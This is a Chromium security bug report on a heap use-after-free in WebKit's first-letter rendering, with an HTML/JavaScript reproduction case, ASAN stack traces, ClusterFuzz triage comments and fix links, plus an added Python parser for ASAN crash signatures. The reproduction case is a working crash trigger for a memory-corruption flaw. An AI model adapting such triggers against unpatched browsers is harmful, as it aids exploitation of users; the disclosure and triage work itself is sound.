Status: Fixed
Owner:
Closed: Dec 2012
Components:
EstimatedDays: ----
NextAction: ----
OS: All
Pri: 1
Type: Bug-Security
Heap-use-after-free in WebCore::RenderText::removeTextBox
Reported by miau...@gmail.com, Mar 29 2012


VULNERABILITY DETAILS

use-after-free in WebCore::RenderText::removeTextBox

VERSION
Chrome Version: stable, beta, dev

Chromium	19.0.1085.0 (Developer Build 129583)
OS	Linux
WebKit	536.5 (@112458)

Operating System: 64bit linux

REPRODUCTION CASE
<html>
  <head>
    <style>
      #el0 {
        -webkit-column-count:2;
        display: table-cell;
      }
      #el0::first-letter {
        background-size: auto;
      }
      #el1 {
        float: right;
      }
    </style>
    <script>
      onload = function() {
        el0=document.createElement('div')
        el0.setAttribute('id','el0')
        document.body.appendChild(el0)
        el1=document.createElement('div')
        el1.setAttribute('id','el1')
        el0.appendChild(el1)
        el0.appendChild(document.createTextNode(unescape('%u3200A')))
        document.designMode='on'
        window.getSelection().setBaseAndExtent(el1, 0, el1, 0)
        document.execCommand('InsertLineBreak')
        document.execCommand('selectall')
        document.execCommand('strikethrough')
        document.execCommand('FormatBlock', false, '<'+'pre>')
      }
    </script>
  </head>
  <body>
  </body>
</html>


FOR CRASHES, PLEASE INCLUDE THE FOLLOWING ADDITIONAL INFORMATION
Type of crash: renderer + asan
Crash State: 

==32492== ERROR: AddressSanitizer heap-use-after-free on address 0x7fffe761d5c0 at pc 0x55555ad105b7 bp 0x7fffffff3020 sp 0x7fffffff3018
READ of size 8 at 0x7fffe761d5c0 thread T0
    #0 0x55555ad105b7 in WebCore::RenderText::removeTextBox(WebCore::InlineTextBox*) ???:0
    #1 0x55555aa1ce29 in WebCore::InlineTextBox::deleteLine(WebCore::RenderArena*) ???:0
    #2 0x55555aa04e8d in WebCore::InlineFlowBox::deleteLine(WebCore::RenderArena*) ???:0

0x7fffe761d5c0 is located 64 bytes inside of 96-byte region [0x7fffe761d580,0x7fffe761d5e0)
freed by thread T0 here:
    #0 0x55555de50f32 in free ??:0
    #1 0x55555aa8e3c9 in WebCore::RenderBlock::createFirstLetterRenderer(WebCore::RenderObject*, WebCore::RenderObject*) ???:0
    #2 0x55555aa8f0c6 in WebCore::RenderBlock::updateFirstLetter() ???:0
    #3 0x55555aa43e02 in WebCore::RenderBlock::layout() ???:0

Attachments:
  beta-6496.txt (13.7 KB)
  stable-6496.txt (13.7 KB)
  6496.html (923 bytes)
  6496.txt (13.8 KB)
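The ASAN report above carries the same information that ClusterFuzz condenses into the "Crash State" blocks in the later comments: the access type and size, the top of the crash stack, and the top of the stack that freed the object. As an added example, not part of this bug report or of Chromium's own tooling, here is a small Python parser that reads that report (embedded below as constructed sample input) and reduces it to a crash type and a de-duplication state. The two-frame depth and the allocator-frame skip list are assumptions chosen to reproduce the summary shown in this thread; ClusterFuzz's real heuristics are more elaborate.

```python
import re
from dataclasses import dataclass, field
from typing import List, Optional

# Constructed sample input: the ASAN report quoted in the bug report above.
SAMPLE_REPORT = """\
==32492== ERROR: AddressSanitizer heap-use-after-free on address 0x7fffe761d5c0 at pc 0x55555ad105b7 bp 0x7fffffff3020 sp 0x7fffffff3018
READ of size 8 at 0x7fffe761d5c0 thread T0
    #0 0x55555ad105b7 in WebCore::RenderText::removeTextBox(WebCore::InlineTextBox*) ???:0
    #1 0x55555aa1ce29 in WebCore::InlineTextBox::deleteLine(WebCore::RenderArena*) ???:0
    #2 0x55555aa04e8d in WebCore::InlineFlowBox::deleteLine(WebCore::RenderArena*) ???:0

0x7fffe761d5c0 is located 64 bytes inside of 96-byte region [0x7fffe761d580,0x7fffe761d5e0)
freed by thread T0 here:
    #0 0x55555de50f32 in free ??:0
    #1 0x55555aa8e3c9 in WebCore::RenderBlock::createFirstLetterRenderer(WebCore::RenderObject*, WebCore::RenderObject*) ???:0
    #2 0x55555aa8f0c6 in WebCore::RenderBlock::updateFirstLetter() ???:0
    #3 0x55555aa43e02 in WebCore::RenderBlock::layout() ???:0
"""

# Both the old "AddressSanitizer heap-use-after-free" and the newer
# "AddressSanitizer: heap-use-after-free" header spellings are accepted.
ERROR_RE = re.compile(r"ERROR: AddressSanitizer:? (?P<kind>[\w-]+) on address (?P<addr>0x[0-9a-f]+)")
ACCESS_RE = re.compile(r"^(?P<op>READ|WRITE) of size (?P<size>\d+) at (?P<addr>0x[0-9a-f]+)")
REGION_RE = re.compile(r"is located (?P<off>\d+) bytes (?:inside|to the (?:right|left)) of (?P<size>\d+)-byte region")
# A frame is "#N <pc> in <function[(args)]> <location>"; the function may contain
# spaces inside its argument list, so match lazily and peel the location off the end.
FRAME_RE = re.compile(r"^\s*#(?P<idx>\d+) 0x[0-9a-f]+ in (?P<func>.+?)(?:\s+(?P<loc>\S+))?$")
FREED_RE = re.compile(r"^freed by thread")
ALLOC_RE = re.compile(r"^previously allocated by thread")

# Allocator wrappers carry no signal for de-duplication (assumed skip list).
ALLOCATOR_FRAMES = {"free", "malloc", "calloc", "realloc", "operator new", "operator delete"}


@dataclass
class AsanReport:
    kind: str = ""                      # e.g. "heap-use-after-free"
    address: str = ""                   # faulting address
    access: Optional[str] = None        # e.g. "READ 8"
    offset: Optional[int] = None        # bytes into the freed/overflowed region
    region_size: Optional[int] = None   # size of that region
    crash_stack: List[str] = field(default_factory=list)
    free_stack: List[str] = field(default_factory=list)
    alloc_stack: List[str] = field(default_factory=list)


def parse_asan_report(text: str) -> AsanReport:
    """Walk the report line by line, routing frames into whichever stack is current."""
    report = AsanReport()
    current: Optional[List[str]] = None
    for line in text.splitlines():
        m = ERROR_RE.search(line)
        if m:
            report.kind, report.address = m.group("kind"), m.group("addr")
            current = report.crash_stack
            continue
        m = ACCESS_RE.match(line.strip())
        if m:
            report.access = f"{m.group('op')} {m.group('size')}"
            continue
        m = REGION_RE.search(line)
        if m:
            report.offset, report.region_size = int(m.group("off")), int(m.group("size"))
            continue
        if FREED_RE.match(line):
            current = report.free_stack
            continue
        if ALLOC_RE.match(line):
            current = report.alloc_stack
            continue
        m = FRAME_RE.match(line)
        if m and current is not None:
            # Drop the argument list so overloads collapse to one symbol.
            current.append(m.group("func").split("(")[0])
    return report


def crash_type(report: AsanReport) -> str:
    """'Heap-use-after-free READ 8' style label, as used in the thread above."""
    return f"{report.kind.capitalize()} {report.access}".strip()


def crash_state(report: AsanReport, depth: int = 2) -> List[str]:
    """Top `depth` non-allocator frames of the crash stack, then of the free stack."""
    def top(frames: List[str]) -> List[str]:
        return [f for f in frames if f not in ALLOCATOR_FRAMES][:depth]
    state = top(report.crash_stack)
    if report.free_stack:
        state += top(report.free_stack)
    return state


def signature(report: AsanReport) -> str:
    """Stable de-duplication key: crash type plus the crash state joined with '|'."""
    return "|".join([crash_type(report)] + crash_state(report))


if __name__ == "__main__":
    r = parse_asan_report(SAMPLE_REPORT)
    print("Crash Type:", crash_type(r))
    print("Crash State:", *crash_state(r), sep="\n  ")
    print("Region:", r.offset, "bytes into a", r.region_size, "byte region")
```

Two reports whose `signature()` matches are very likely the same bug even when the faulting address and the pc values differ from run to run, which is why the summaries in the ClusterFuzz comments below carry frame names rather than addresses.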
Comment 1 by kenrb@chromium.org, Mar 30 2012
Labels: -Pri-0 -Area-Undefined Pri-1 Area-WebKit SecSeverity-High Mstone-18 OS-All SecImpacts-Stable SecImpacts-Beta
Status: Available
I can see this on trunk in a debugger, though it's tricky because it looks to me like the memory is getting reallocated before use (so it actually shows to me as a bad cast, but it's more likely a use after free).

I have not been able to verify on stable or beta (it doesn't crash for me and I don't have ASAN builds). I'm flagging based on the provided stack traces for those.

Looks like cluster-fuzz is not showing this for some reason?
Comment 2 by kenrb@chromium.org, Mar 30 2012
Scratch that... it just reproduced on CF. I'll attach the test case as soon as the regression range is provided.
Comment 3 by kenrb@chromium.org, Mar 30 2012
Summary: Heap-use-after-free in WebCore::RenderText::removeTextBox (was: NULL)
Detailed report: https://cluster-fuzz.appspot.com/testcase?key=32105509

Uploader: kenrb@chromium.org

Crash Type: Heap-use-after-free READ 8
Crash Address: 0x7f5bb5af96c0
Crash State:
  - crash stack -
  WebCore::RenderText::removeTextBox
  WebCore::InlineTextBox::deleteLine
  - free stack -
  WebCore::RenderBlock::createFirstLetterRenderer
  WebCore::RenderBlock::updateFirstLetter
  
Regressed: https://cluster-fuzz.appspot.com/revisions?range=112953:112954

Minimized Testcase (0.90 Kb): https://cluster-fuzz.appspot.com/download/AMIfv96EzTntiugalR5zGUxbJtbyaRJk-r5kiAR2I0Ke31sqkQJ4ZwpCJUvXBPzTx8jAG_V4fa7v-T7yjaurgwBRFzgw0K_5hDSW9SR61gbSAVqFfA6NbXK0fkD_JimJQ4p8uq6DpwgogLgwVrANb1zb8W5Y1C66EA
Comment 4 by kenrb@chromium.org, Mar 30 2012
Regression range isn't correct.
The repro is not reliable, which looks to be the reason it wasn't reproducing at first in c#1.
I made the repro reliable for CF. Report coming.
Detailed report: https://cluster-fuzz.appspot.com/testcase?key=32408814

Uploader: inferno@chromium.org

Crash Type: Heap-use-after-free READ 8
Crash Address: 0x7ff469bd8ec0
Crash State:
  - crash stack -
  WebCore::RenderText::removeTextBox
  WebCore::InlineTextBox::deleteLine
  - free stack -
  WebCore::RenderBlock::createFirstLetterRenderer
  WebCore::RenderBlock::updateFirstLetter
  

Minimized Testcase (0.88 Kb): https://cluster-fuzz.appspot.com/download/AMIfv95U06HC2vo6q7QMMBefFCIcXurvUoyhfrYLK_pD8f70LvOdOMD8oiAi0_h6kBQq242sg46hWlOnbvjVao6eUi3DTfCS8vNtp-XW5BfBkPFX4WzbqRyH4VIBcUhD5WVDkbyGtbnaoZEJ-wVq6NUccCBKh8vqRg
Miaubiz, if any of your repros require pressing the refresh button, please do add a location.reload() at end of your repro in the future.
Comment 9 by miau...@gmail.com, Apr 1 2012
is it ok if I add location.reload() to everything just in case? It's not the refresh button which triggers but trying it n-times helps with the flakiness, right? it works 100% on my box (tm) :D
If location.reload() helps to reduce flakiness, then yes. Otherwise, if your repro is 100% reliable without it, then please don't add it.
Comment 11 by miau...@gmail.com, Apr 1 2012
I have no way to tell how it will behave on CF. :(
Comment 12 by kenrb@chromium.org, May 10 2012
Owner: kenrb@chromium.org
Status: Started
Labels: -Mstone-18 Mstone-19
m19 is out, moving milestone m18 bugs to m19.
Labels: -Restrict-View-SecurityTeam Restrict-View-SecurityNotify Merge-Approved
Status: FixUnreleased
http://trac.webkit.org/changeset/117309
Project Member Comment 16 by clusterf...@chromium.org, May 18 2012
ClusterFuzz has detected this issue as fixed in range 137694:137702.

Detailed report: https://cluster-fuzz.appspot.com/testcase?key=32408814

Uploader: inferno@chromium.org

Crash Type: Heap-use-after-free READ 8
Crash Address: 0x7ff469bd8ec0
Crash State:
  - crash stack -
  WebCore::RenderText::removeTextBox
  WebCore::InlineTextBox::deleteLine
  - free stack -
  WebCore::RenderBlock::createFirstLetterRenderer
  WebCore::RenderBlock::updateFirstLetter
  
Fixed: https://cluster-fuzz.appspot.com/revisions?range=137694:137702

Minimized Testcase: https://cluster-fuzz.appspot.com/download/AMIfv95U06HC2vo6q7QMMBefFCIcXurvUoyhfrYLK_pD8f70LvOdOMD8oiAi0_h6kBQq242sg46hWlOnbvjVao6eUi3DTfCS8vNtp-XW5BfBkPFX4WzbqRyH4VIBcUhD5WVDkbyGtbnaoZEJ-wVq6NUccCBKh8vqRg

If you suspect that the result above is incorrect, try re-doing that job on the testcase report page.
Labels: -Merge-Approved Merge-Merged reward-topanel
M19: http://trac.webkit.org/changeset/117875
M20: http://trac.webkit.org/changeset/117876
Labels: -reward-topanel reward-1000 reward-unpaid
Thank you miaubiz. Textbook UAF, $1000
Labels: CVE-2011-3105
Labels: -reward-unpaid
Project Member Comment 21 by bugdroid1@chromium.org, Oct 13 2012
Labels: Restrict-AddIssueComment-Commit
This issue has been closed for some time. No one will pay attention to new comments.
If you are seeing this bug or have new data, please click New Issue to start a new bug.
Status: Fixed
Project Member Comment 23 by bugdroid1@chromium.org, Mar 10 2013
Labels: -Type-Security -Area-WebKit -SecSeverity-High -SecImpacts-Stable -SecImpacts-Beta -Mstone-19 Cr-Content Security-Impact-Stable Security-Impact-Beta Security-Severity-High M-19 Type-Bug-Security
Project Member Comment 24 by bugdroid1@chromium.org, Mar 13 2013
Labels: Restrict-View-EditIssue
Project Member Comment 25 by bugdroid1@chromium.org, Mar 13 2013
Labels: -Restrict-AddIssueComment-Commit Restrict-AddIssueComment-EditIssue
Labels: -Restrict-View-SecurityNotify -Restrict-View-EditIssue
Project Member Comment 27 by bugdroid1@chromium.org, Mar 21 2013
Labels: -Security-Severity-High Security_Severity-High
Project Member Comment 28 by bugdroid1@chromium.org, Mar 21 2013
Labels: -Security-Impact-Stable Security_Impact-Stable
Project Member Comment 29 by bugdroid1@chromium.org, Mar 21 2013
Labels: -Security-Impact-Beta Security_Impact-Beta
Project Member Comment 30 by bugdroid1@chromium.org, Apr 6 2013
Labels: -Cr-Content Cr-Blink
Project Member Comment 31 by sheriffbot@chromium.org, Jun 14 2016
Labels: -security_impact-beta
Project Member Comment 32 by sheriffbot@chromium.org, Oct 1 2016
This bug has been closed for more than 14 weeks. Removing security view restrictions.

For more details visit https://www.chromium.org/issue-tracking/autotriage - Your friendly Sheriffbot
Project Member Comment 33 by sheriffbot@chromium.org, Oct 2 2016
This bug has been closed for more than 14 weeks. Removing security view restrictions.

For more details visit https://www.chromium.org/issue-tracking/autotriage - Your friendly Sheriffbot
Labels: allpublic